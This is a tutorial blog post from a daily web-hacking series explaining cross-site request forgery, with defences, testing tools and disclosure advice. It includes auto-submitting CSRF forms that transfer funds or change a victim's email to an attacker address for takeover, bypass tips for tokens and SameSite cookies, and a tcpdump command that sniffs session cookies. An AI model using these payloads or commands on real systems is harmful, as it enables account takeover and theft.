Hey guys, Rocky here! 🎭🔐
Welcome to Day 5 of the Daily Web Hacking series! We’ve covered XSS, SQLi, and more. Today, we’re diving into Part 5: Cross-Site Request Forgery (CSRF)—the art of tricking users into unknowingly attacking themselves. Imagine convincing someone to sign a check they never saw. That’s CSRF in a nutshell. Let’s break it down!
—
What is CSRF?
Cross-Site Request Forgery (CSRF) forces a logged-in user to execute unwanted actions on a trusted site. By exploiting the browser’s automatic cookie-sending behavior, attackers can:
- Change account details (email, password).
- Transfer funds (banking apps).
- Post malicious content (social media).
- Hijack entire accounts.
Why it’s dangerous:
- #8 in the OWASP Top 10 (2021).
- Affects 1 in 5 web apps (OWASP, 2023).
- Silent and deadly—users have no clue it’s happening.
—
How CSRF Works: The Silent Puppeteer
Let’s say you’re logged into your bank. A hacker sends you a malicious link:
<img src="https://bank.com/transfer?to=hacker&amount=1000" width="0" height="0">
What happens:
- You click the link (or it loads in a hidden tab).
- Your browser sends your session cookie to
bank.com.
- The bank thinks you authorized the transfer.
- $1,000 disappears.
Key Insight: Browsers automatically attach cookies to requests, even from malicious sites.
—
Types of CSRF
1. GET-Based CSRF
How: Triggered via <img>, <script>, or <iframe> tags.
Example:
<img src="https://social.com/delete-profile">
- Deletes your profile when the image loads.
2. POST-Based CSRF
How: Uses hidden forms to submit POST requests.
Example:
<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="to" value="hacker">
<input type="hidden" name="amount" value="1000">
</form>
<script>document.forms[0].submit();</script>
3. JSON CSRF
How: Tricks servers into accepting JSON payloads via <form> or Flash.
Example:
<form action="https://api.site/update" enctype="text/plain" method="POST">
<input name='{"role":"admin","new":true}' value='}' type="hidden">
</form>
- Sends a valid JSON payload:
{"role":"admin","new":true}.
—
Real-World CSRF Disasters
- Netflix (2006): Attackers used CSRF to alter DVD queues.
- Gmail (2007): CSRF flaw let attackers hijack email filters.
- YouTube (2008): CSRF allowed attackers to add/delete subscriptions.
Lesson: Even tech giants aren’t immune.
—
Step-by-Step CSRF Exploitation
Let’s hack a vulnerable password-change feature:
1. Identify the Target Action
- Find a sensitive endpoint (e.g.,
POST /change-email).
2. Craft the Malicious Request
Create a hidden form:
<form action="https://hacklivly.com/change-email" method="POST">
<input type="hidden" name="email" value="hacker@evil.com">
</form>
<script>document.forms[0].submit();</script>
3. Trick the User
- Send the payload via phishing emails, forums, or malicious ads.
4. Profit
- The user’s email is changed to
hacker@evil.com.
- Reset their password via “Forgot Password.”
—
Bypassing CSRF Protections
1. CSRF Tokens
- What: Unique tokens per request.
- Bypass:
- Steal the token via XSS.
- Guess weak tokens (e.g., time-based).
2. SameSite Cookies
- What: Cookies marked
SameSite=Lax aren’t sent cross-site.
- Bypass:
- Use
GET requests (allowed in Lax mode).
- Exploit subdomain takeovers.
3. Referer/Origin Checks
- What: Servers check if requests come from their domain.
- Bypass:
- Use HTTPS → HTTP downgrades (Referer isn’t sent).
- Exploit browser quirks (e.g.,
data: URIs).
—
Defending Against CSRF
1. CSRF Tokens
Generate unique, random tokens per session.
Example (Django):
<form>
<input type="hidden" name="csrfmiddlewaretoken" value="R4nd0mStr1ng">
</form>
2. SameSite Cookies
3. Double Submit Cookies
- Send the token in both the cookie and request body.
4. Custom Headers
- Require headers like
X-Requested-With (blocks simple CSRF).
—
Advanced CSRF Tactics
1. Flash-Based CSRF
- Use Flash to send arbitrary headers (deprecated in 2020 but still relevant).
2. DNS Rebinding
- Bypass SameSite restrictions by rebinding DNS to the target’s IP.
3. XSS + CSRF = Supervillain Combo
- Steal CSRF tokens via XSS, then forge valid requests.
—
Tools for CSRF Testing
1. Burp Suite
- Generate CSRF PoC (Proof of Concept) from captured requests.
2. CSRFTester
- Open-source tool to test for CSRF vulnerabilities.
3. Postman
- Replay requests to check token validity.
—
Practice CSRF Legally
1. OWASP Juice Shop
2. PortSwigger Labs
—
Ethical Hacking & Reporting
Never exploit CSRF without permission. If you find a flaw:
- Document: Record steps to reproduce.
- Report: Use the site’s security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
—
What’s Next? Part 6: Session Hijacking
Tomorrow, we’ll explore Session Hijacking—stealing cookies, exploiting JWT tokens, and taking over accounts. Sneak peek:
# Sniffing cookies with tcpdump
tcpdump -i eth0 'port 80' | grep 'Cookie:'
—
Final Thoughts
CSRF is a masterclass in deception—exploiting trust between users and sites. But with defenses like CSRF tokens and SameSite cookies, we can shut it down. Stay curious, stay ethical, and keep breaking things (responsibly)!
Rocky signing off! ✌️
—
P.S. If you’re enjoying this series, share it with your network! Let’s turn newbies into security ninjas.
Discussion Question: What’s the sneakiest CSRF attack you’ve seen? I once saw a CSRF worm that auto-liked a post for every visitor. 😂 Spill your stories below! 👇
